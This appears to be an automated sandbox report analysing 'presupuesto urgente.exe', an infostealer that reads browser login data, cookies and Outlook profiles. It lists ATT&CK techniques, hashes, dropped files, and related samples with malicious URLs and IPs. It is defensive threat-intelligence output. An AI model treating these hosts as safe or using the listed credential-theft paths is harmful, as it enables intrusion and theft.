        Source: Yara match | File source: 00000004.00000002.12651169047.00000000036E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000004.00000002.12651069125.00000000036A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000002.00000002.8373636229.0000000034250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: C:\Windows\SysWOW64\winrs.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
        Source: C:\Windows\SysWOW64\winrs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
        Source: C:\Windows\SysWOW64\winrs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
        Source: C:\Windows\SysWOW64\winrs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
        Source: C:\Windows\SysWOW64\winrs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
        Source: C:\Windows\SysWOW64\winrs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
        Source: C:\Windows\SysWOW64\winrs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
        Source: C:\Windows\SysWOW64\winrs.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

        Remote Access Functionality

        Source: Yara match | File source: 00000004.00000002.12649287914.0000000003010000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000002.00000002.8372536747.00000000331E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000003.00000002.12650331699.00000000013B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000003.00000002.12651774675.0000000003A80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000004.00000002.12651169047.00000000036E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000004.00000002.12651069125.00000000036A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000002.00000002.8373636229.0000000034250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
        |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
        | Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Native API | 1 DLL Side-Loading | 1 Access Token Manipulation | 1 Masquerading | 1 OS Credential Dumping | 121 Security Software Discovery | Remote Services | 1 Email Collection | 11 Encrypted Channel | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot |
        | Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 212 Process Injection | 2 Virtualization/Sandbox Evasion | LSASS Memory | 2 Virtualization/Sandbox Evasion | Remote Desktop Protocol | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
        | Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 Abuse Elevation Control Mechanism | 1 Access Token Manipulation | Security Account Manager | 2 Process Discovery | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
        | Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 DLL Side-Loading | 212 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | 1 Clipboard Data | 5 Application Layer Protocol | Traffic Duplication | Data Destruction |
        | Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 3 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
        | Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | 14 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
        | DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 2 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
        | Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
        [Behavior Graph ID: 1525571. Sample: presupuesto urgente.exe; Startdate: 04/10/2024; Architecture: WINDOWS; Score: 100. Process chain: presupuesto urgente.exe started presupuesto urgente.exe, which injected qnFwqCOYxcUlZ.exe, which started winrs.exe, which started firefox.exe.]

        | Source | Detection | Scanner | Label | Link |
        |---|---|---|---|---|
        | presupuesto urgente.exe | 18% | ReversingLabs | Win32.Trojan.Generic | |
        | presupuesto urgente.exe | 100% | Avira | HEUR/AGEN.1331786 | |
        | presupuesto urgente.exe | 23% | Virustotal | | Browse |

        | Source | Detection | Scanner | Label | Link |
        |---|---|---|---|---|
        | C:\Users\user\AppData\Local\Temp\nsl6F0B.tmp\System.dll | 0% | ReversingLabs | | |

        No Antivirus matches
                NameMaliciousAntivirus DetectionReputation
Name | Source | Malicious | Antivirus Detection | Reputation
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1525571
Start date and time: 2024-10-04 11:54:09 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 17m 46s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301)
Run name: Suspected Instruction Hammering
Number of analysed new started processes analysed: 6
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Sample name: presupuesto urgente.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/9@30/12
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 86%
• Number of executed functions: 52
• Number of non-executed functions: 273
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Max analysis timeout: 600s exceeded, the analysis took too long
• Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtSetInformationFile calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time      Type             Description
05:58:20  API Interceptor  30599272x Sleep call for process: winrs.exe modified
Match   Associated Sample Name / URL   SHA 256   Detection   Threat Name   Link   Context
                                                                                                                                  13.248.169.48-pdf.bat.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • www.invicta.world/tcs6/
                                                                                                                                  payment copy.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • www.firstcry.shop/e4x0/
                                                                                                                                  Arrival Notice_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • www.invicta.world/aohi/
                                                                                                                                  shipping documents_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • www.mynotebook.shop/3q2o/
                                                                                                                                  Shipping Documents_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • www.sapatarias.online/3632/
                                                                                                                                  shipping notification_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • www.sapatarias.online/3632/
                                                                                                                                  RN# D7521-RN-00353 REV-2.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • www.luxe.guru/s9un/
                                                                                                                                  gvyO903Xmm.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • www.4it.services/bopi/?_FQ8hB=RB9p3Jfq9ZvBoyq8+0+Fmui7HG2krdiIZXqgFfVf6IzsfIQ1CkKG0m46V1pTk3XN6PXG&qL3=eXSlCFXxoF
                                                                                                                                  CITA#U00c7#U00c3O.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • www.dyme.tech/h7lb/
                                                                                                                                  ADNOC requesting RFQ.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • www.smilechat.shop/ih4n/
                                                                                                                                  46.102.130.116GestionPagoAProveedores_100920241725998901306_PDF.cmdGet hashmaliciousRemcos, DBatLoader, FormBookBrowse
                                                                                                                                  • www.hedieplastic.com/qlei/
                                                                                                                                  XJBYhQFCGi.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • www.hedieplastic.com/m8cr/
                                                                                                                                  31.217.192.158GestionPagoAProveedores_100920241725998901306_PDF.cmdGet hashmaliciousRemcos, DBatLoader, FormBookBrowse
                                                                                                                                  • www.jennarauten.com/h9tv/
                                                                                                                                  XJBYhQFCGi.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • www.jennarauten.com/m8cr/
                                                                                                                                  IMAGE_0010.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • www.jennarauten.com/iemu/
                                                                                                                                  SecuriteInfo.com.Win32.PWSX-gen.19996.21102.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • www.jennarauten.com/m8cr/
                                                                                                                                  gMCSnfJRqp.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • www.jennarauten.com/m8cr/
                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                  www.stayvact.xyzGestionPagoAProveedores_100920241725998901306_PDF.cmdGet hashmaliciousRemcos, DBatLoader, FormBookBrowse
                                                                                                                                  • 199.192.19.19
                                                                                                                                  XJBYhQFCGi.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 199.192.19.19
                                                                                                                                  SecuriteInfo.com.Win32.PWSX-gen.19996.21102.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 199.192.19.19
                                                                                                                                  gMCSnfJRqp.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 199.192.19.19
                                                                                                                                  parkingpage.namecheap.comnBjauMrrmC.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 91.195.240.19
                                                                                                                                  H9DsG7WKGt.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 91.195.240.19
                                                                                                                                  GestionPagoAProveedores_100920241725998901306_PDF.cmdGet hashmaliciousRemcos, DBatLoader, FormBookBrowse
                                                                                                                                  • 91.195.240.19
                                                                                                                                  0001.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 91.195.240.19
                                                                                                                                  r8ykXfy52F9CXd5d.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 91.195.240.19
                                                                                                                                  z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 91.195.240.19
                                                                                                                                  5h48M0mr7p.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 91.195.240.19
                                                                                                                                  t5ueYgHiHnIdeNe.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 91.195.240.19
                                                                                                                                  OjKmJJm2YT.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                  • 91.195.240.19
                                                                                                                                  M62eQtS9qP.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                  • 91.195.240.19
                                                                                                                                  www.taketechai.com.cdn.hstgr.netGestionPagoAProveedores_100920241725998901306_PDF.cmdGet hashmaliciousRemcos, DBatLoader, FormBookBrowse
                                                                                                                                  • 84.32.84.196
                                                                                                                                  XJBYhQFCGi.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 84.32.84.135
                                                                                                                                  SecuriteInfo.com.Win32.PWSX-gen.19996.21102.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 191.101.104.165
                                                                                                                                  gMCSnfJRqp.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 84.32.84.92
                                                                                                                                  www.drivemktg.coz27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 193.108.130.23
                                                                                                                                  z1PEDIDODECOMPRAURGENTE.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 193.108.130.23
                                                                                                                                  z2AMOSTRAS.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 193.108.130.23
                                                                                                                                  #U0417#U0410#U041f#U0420#U041e#U0421.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 193.108.130.23
                                                                                                                                  #U0417#U0410#U041f#U0420#U041e#U0421.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 193.108.130.23
                                                                                                                                  #U041e#U041f#U0418#U0421#U0410#U041d#U0418#U0415.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 193.108.130.23
                                                                                                                                  #U0417#U0410#U041a#U0410#U0417 #U041d#U0410 #U041f#U041e#U041a#U0423#U041f#U041a#U0423.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 193.108.130.23
                                                                                                                                  #U0633#U0641#U0627#U0631#U0634 #U062e#U0631#U06cc#U062f #U062c#U062f#U06cc#U062f.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 193.108.130.23
                                                                                                                                  #U0633#U0641#U0627#U0631#U0634 #U062e#U0631#U06cc#U062f #U062c#U062f#U06cc#U062f.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 193.108.130.23
                                                                                                                                  #U0646#U0645#U0648#U0646#U0647 #U0647#U0627.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 193.108.130.23
                                                                                                                                  www.sleephygienist.orgGestionPagoAProveedores_100920241725998901306_PDF.cmdGet hashmaliciousRemcos, DBatLoader, FormBookBrowse
                                                                                                                                  • 13.248.169.48
                                                                                                                                  bin.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                  • 91.195.240.117
                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                  EQUINIX-CONNECT-EMEAGBhttps://www.calameo.com/read/0077804248b46bb5a7c19Get hashmaliciousHtmlDropperBrowse
                                                                                                                                  • 85.233.202.179
                                                                                                                                  GestionPagoAProveedores_100920241725998901306_PDF.cmdGet hashmaliciousRemcos, DBatLoader, FormBookBrowse
                                                                                                                                  • 31.217.192.158
                                                                                                                                  https://whatsthestory.dublincity.ie/Get hashmaliciousUnknownBrowse
                                                                                                                                  • 217.114.160.102
                                                                                                                                  RANGLANDLAW.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                  • 85.233.202.179
                                                                                                                                  RANGLANDLAW.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                  • 85.233.202.179
                                                                                                                                  xWTju4vS5WGet hashmaliciousMiraiBrowse
                                                                                                                                  • 158.178.145.81
                                                                                                                                  mipsGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                                                                                                  • 89.107.18.17
                                                                                                                                  https://www.calameo.com/read/007744914704399cca748Get hashmaliciousUnknownBrowse
                                                                                                                                  • 85.233.202.179
                                                                                                                                  botx.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                  • 213.52.157.158
                                                                                                                                  XAjV9ghiIb.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                  • 213.52.245.117
                                                                                                                                  AMAZON-02USSwift_92be67ab-e027-4955-b6fc-64bd720.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 13.248.160.137
                                                                                                                                  https://ok.me/KtdI1Get hashmaliciousUnknownBrowse
                                                                                                                                  • 3.127.216.164
                                                                                                                                  https://ok.me/KtdI1Get hashmaliciousUnknownBrowse
                                                                                                                                  • 35.158.71.179
                                                                                                                                  6BTZGMvUv1.elfGet hashmaliciousUnknownBrowse
                                                                                                                                  • 52.27.90.165
                                                                                                                                  MOfHb44mph.elfGet hashmaliciousUnknownBrowse
                                                                                                                                  • 13.255.192.88
                                                                                                                                  -pdf.bat.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 54.67.87.110
                                                                                                                                  https://irp.cdn-website.com/02ccf804/files/uploaded/webpage.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                  • 13.32.99.71
                                                                                                                                  Full Litigation File.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                  • 3.160.150.68
                                                                                                                                  https://go.hginsights.com/rs/214-HYO-692/images/HGGet hashmaliciousUnknownBrowse
                                                                                                                                  • 18.245.46.12
                                                                                                                                  faststone-capture_voLss-1.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                                                  • 18.245.86.8
                                                                                                                                  DIALTELECOMROGestionPagoAProveedores_100920241725998901306_PDF.cmdGet hashmaliciousRemcos, DBatLoader, FormBookBrowse
                                                                                                                                  • 46.102.130.116
                                                                                                                                  SecuriteInfo.com.Win32.Sector.30.19697.26848.exeGet hashmaliciousSalityBrowse
                                                                                                                                  • 89.41.154.115
                                                                                                                                  https://fwealthm.comGet hashmaliciousUnknownBrowse
                                                                                                                                  • 89.43.104.243
                                                                                                                                  https://email.eventtia-mailer.com/c/eJwUyztuwzAMANDTSJsM8ROaGTR0yTUKiXQboREc2K6B3r7w9pbn5Uv0BhCXAjOiZMyo8VnEZiES8kV5IWB3vQPcSIUxa-PYi0g1R2xNmssnWXasxm713kyNswoHzv2dYMZEkFATgE6j9ld8ledxvPdAHwEfAR-jnn1M23rxZ49b-au0t_U3cP6-wmTriGfB_wAAAP__1csxIwGet hashmaliciousUnknownBrowse
                                                                                                                                  • 84.247.23.244
                                                                                                                                  XAjV9ghiIb.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                  • 176.223.59.168
                                                                                                                                  mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                  • 93.118.89.113
                                                                                                                                  Rendeles_110078670008860000002.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                                                                                                  • 86.107.36.93
                                                                                                                                  Rendeles_1100786700088673955430.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                                                                                                  • 86.107.36.93
                                                                                                                                  wzjEaheCBP.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                                                                                                  • 86.107.36.93
                                                                                                                                                    Process:C:\Windows\SysWOW64\winrs.exe
                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):135168
                                                                                                                                                    Entropy (8bit):1.1142956103012707
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:192:8t4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWTPVusE6kvjd:8t4n/9p/39J6hwNKRmqu+7VusEtrd
                                                                                                                                                    MD5:E3F9717F45BF5FFD0A761794A10A5BB5
                                                                                                                                                    SHA1:EBD823E350F725F29A7DE7971CD35D8C9A5616CC
                                                                                                                                                    SHA-256:D79535761C01E8372CCEB75F382E912990929624EEA5D7093A5A566BAE069C70
                                                                                                                                                    SHA-512:F12D2C7B70E898ABEFA35FEBBDC28D264FCA071D66106AC83F8FC58F40578387858F364C838E69FE8FC66645190E1CB2B4B63791DDF77955A1C376424611A85D
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Process:C:\Users\user\Desktop\presupuesto urgente.exe
                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):11776
                                                                                                                                                    Entropy (8bit):5.659384359264642
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:192:ex24sihno00Wfl97nH6BenXwWobpWBTtvShJ5omi7dJWjOlESlS:h8QIl972eXqlWBFSt273YOlEz
                                                                                                                                                    MD5:8B3830B9DBF87F84DDD3B26645FED3A0
                                                                                                                                                    SHA1:223BEF1F19E644A610A0877D01EADC9E28299509
                                                                                                                                                    SHA-256:F004C568D305CD95EDBD704166FCD2849D395B595DFF814BCC2012693527AC37
                                                                                                                                                    SHA-512:D13CFD98DB5CA8DC9C15723EEE0E7454975078A776BCE26247228BE4603A0217E166058EBADC68090AFE988862B7514CB8CB84DE13B3DE35737412A6F0A8AC03
                                                                                                                                                    Malicious:false
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                    Joe Sandbox View:
• Filename: PEDIDO-144797.exe, Detection: malicious
• Filename: PEDIDO-144797.exe, Detection: malicious
• Filename: rpedido-002297.exe, Detection: malicious
• Filename: rpedido-002297.exe, Detection: malicious
• Filename: FACTURA-002297.exe, Detection: malicious
• Filename: FACTURA-002297.exe, Detection: malicious
• Filename: LisectAVT_2403002A_41.exe, Detection: malicious
• Filename: LisectAVT_2403002A_41.exe, Detection: malicious
• Filename: Inventory_list.img.exe, Detection: malicious
                                                                                                                                                    Reputation:moderate, very likely benign file
                                                                                                                                                    Process:C:\Users\user\Desktop\presupuesto urgente.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1373370
                                                                                                                                                    Entropy (8bit):3.900890255684548
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12288:Xmz13uukjak7s0jS8vhL91GbgdQZIKfMiaDacDU0A0K:UNuzD+gDUrR
                                                                                                                                                    MD5:DA817DD2FF7DF00798124C9316B89865
                                                                                                                                                    SHA1:924BED611E5CA8AE2A767779353A3C50022C4B84
                                                                                                                                                    SHA-256:C1C4F27D850CCA276D4665B5F5B2254837831EE462009A03B39781E28DDF8CE9
                                                                                                                                                    SHA-512:ABDDBCDF8FFA41AC84DF645C3B355A3A59C0AA55FFA4C758015D29B73CA7D9411ABFB9FF98422ABE39D4A808287FE236D017330D15B5DAA27CFA1E3B11F83D40
                                                                                                                                                    Malicious:false
                                                                                                                                                    Process:C:\Users\user\Desktop\presupuesto urgente.exe
                                                                                                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):452714
                                                                                                                                                    Entropy (8bit):2.6437725125591145
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:Jxvhq0/c8zEEGKyHdqdqTZIhz+fMikFN905P4:TvhL91GbgdQZIz+fMiaN9ag
                                                                                                                                                    MD5:31FA6D00190DA55D190F69027CD409CC
                                                                                                                                                    SHA1:6E40E777863649597448A8A8C4A88B4DEB77D2CE
                                                                                                                                                    SHA-256:BF04A6E6A09EAD8B83EF15BF34E3D151C5F683D869D02F6DFFCFC632DD130BE7
                                                                                                                                                    SHA-512:5650B68EC2FE4A0C8F068A9EA27CD9A7BAADC2151BB819C7FB0087807D39F860D4B0AC5402C6FFFBA9AE43C7E07D42E9643A3FD17AB0DCFEE715CCF499CB5CB5
                                                                                                                                                    Malicious:false
                                                                                                                                                    Process:C:\Users\user\Desktop\presupuesto urgente.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):219226
                                                                                                                                                    Entropy (8bit):7.436492024340276
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:132zftwOsH2Pnuw9B01E8qxXPDgs2MdpBw7opajuN5Vs9oY7sTtZXMGa3QGkCCLH:1mz1AWPuCXkslB+yajwk7sxKGsjkhkS
                                                                                                                                                    MD5:03016A728D29C285C8CBA4EE426ED89D
                                                                                                                                                    SHA1:776E51BCDEB03EB45E67563C52C8FEC881CC95E1
                                                                                                                                                    SHA-256:20B21594F8F281C5A47ABBBF0D9FC745DDE6EC535E5E6272FF96D1D2DFB13942
                                                                                                                                                    SHA-512:0E23540F06D8423BD0E3E3412988D0C820B3EC0BF7E23A4365AFA4FE8994C1D09B4F8D5B7C2BCA38142322F04B617B3239585147DB052295C0F292E34AB46D6D
                                                                                                                                                    Malicious:false
                                                                                                                                                    Process:C:\Users\user\Desktop\presupuesto urgente.exe
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):523
                                                                                                                                                    Entropy (8bit):4.30492942039079
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:nGy3qcf5opzE6vCdgLMc/Uqv7FE7KRbqYUH6uN0u8vM:GEpxoy6adY/UqvZEwbql6uNh
                                                                                                                                                    MD5:B33890A43FB0F38B6DDF18C5BCEFE234
                                                                                                                                                    SHA1:80ED178A92C2B5CB530AEE4673FFC9011EBF86BB
                                                                                                                                                    SHA-256:3BF02F982A76A4C896FDA78C1C4B2B730D690DD86475213DC415269D4629407B
                                                                                                                                                    SHA-512:169E2D067337BF05BA08D615CE61B28CA4FD93D204966B3386FB4B373D9BACD689BEE3DDC5E04A4F19586E585263F62BC40B0944A10E5867C63C9C7236A5CC48
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:clisiocampa percussing acronyctous petitesses pilgrimsrejser zygosphene miasmology konkyljens..labelable kraftls veneries symbolically duncan sulemadens,logopdisk genuinenesses pseudoinspirational bekenderen.franciscanism krftcellers drylots toksikologiskes rottegiftes impecuniary slisken autokratiets hjertebaandet banegaardsbygningen choenix..adrenocorticotropic mangfoldigheders avisudvikling ekstremitetens skamsloges nrede unpersuasion trachling tvrformatets..negerbolle suppressionen lustful bagels flamenco selrets,
                                                                                                                                                    Process:C:\Users\user\Desktop\presupuesto urgente.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):276551
                                                                                                                                                    Entropy (8bit):1.2459972317120458
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:768:q5eLWls2nEEvz9mAEPesDf7zRhfRKrtTgtOnumyYJBW+JAILJcqhOzwnasNP2r2J:q86nLDJnJuki2BaFsfRz
                                                                                                                                                    MD5:0071DC51C79F0655F0BB77074D56B1D7
                                                                                                                                                    SHA1:9617AE1434B07532BAAF39D69CF720C05B85E8F9
                                                                                                                                                    SHA-256:0628FA8F44795D79D5B855E8387985E04D134E8B57FE4D57E663FBAED278DF89
                                                                                                                                                    SHA-512:E2149E9F3B18DCB50E49EC51226D7A6BF3969E119B385410E80E431024B25A938C965C743D80C0C1D8A3820D0DDDA14464CAC75F73AE22F259B447264F8431BA
                                                                                                                                                    Malicious:false
                                                                                                                                                    Process:C:\Users\user\Desktop\presupuesto urgente.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):398154
                                                                                                                                                    Entropy (8bit):1.2543435533086644
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:8IfJmHKeJzuGrd0myk0Ek5rFnJd62xZ9WEmaslkcO:8omHKAJR0T8axr
                                                                                                                                                    MD5:7BA8E260D6477B4FD16DAE2D14EA4482
                                                                                                                                                    SHA1:16873CB5BFBA899D4ED937603AA9980F119695D6
                                                                                                                                                    SHA-256:C19F7B3F1A20E1529113EE69AA53DB6E124A51F03098E6FB6AF0E76037C85B8B
                                                                                                                                                    SHA-512:ECAA786515C73B08A44C22FD48B205166611750EC633849823A88BBF95A675CA29FB7F22E652EFCFC055FC92F8381FC6276F4B732F91612A2385BF670131FFF2
                                                                                                                                                    Malicious:false
                                                                                                                                                    Process:C:\Users\user\Desktop\presupuesto urgente.exe
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):37
                                                                                                                                                    Entropy (8bit):4.046762824854522
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:lgov8fOMy:XHB
                                                                                                                                                    MD5:CFDA8E6AADE7958F94A959BDB29CB209
                                                                                                                                                    SHA1:59C459E105A7AF33D13A365F735E3CB7B8E5DDB0
                                                                                                                                                    SHA-256:B4543E8AB4997934D2EDC7DE8A76A24B7C2CCB641212AE3B9B17FE05B71D3E87
                                                                                                                                                    SHA-512:EDFDCA00667ED3A5558F7E614373F0B8393763A979154666972C659CB44E75CCD51170E4E2189043046EB4DDB8A68642BBDB6F98A0E494E76E86FAAF14F993B2
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:[xanthippe]..sikkerhedsgraden=preve..
                                                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                    Entropy (8bit):7.244448418739602
                                                                                                                                                    TrID:
                                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                    File name:presupuesto urgente.exe
                                                                                                                                                    File size:582'088 bytes
                                                                                                                                                    MD5:8ae672783481c0b46780431bfce5a216
                                                                                                                                                    SHA1:ace989f4c2a82f48cc3167e531ab13d2999537b2
                                                                                                                                                    SHA256:5e279ef4c54dfc525f423b98054f37ee6eb51a71e8c1f76d5438393055442173
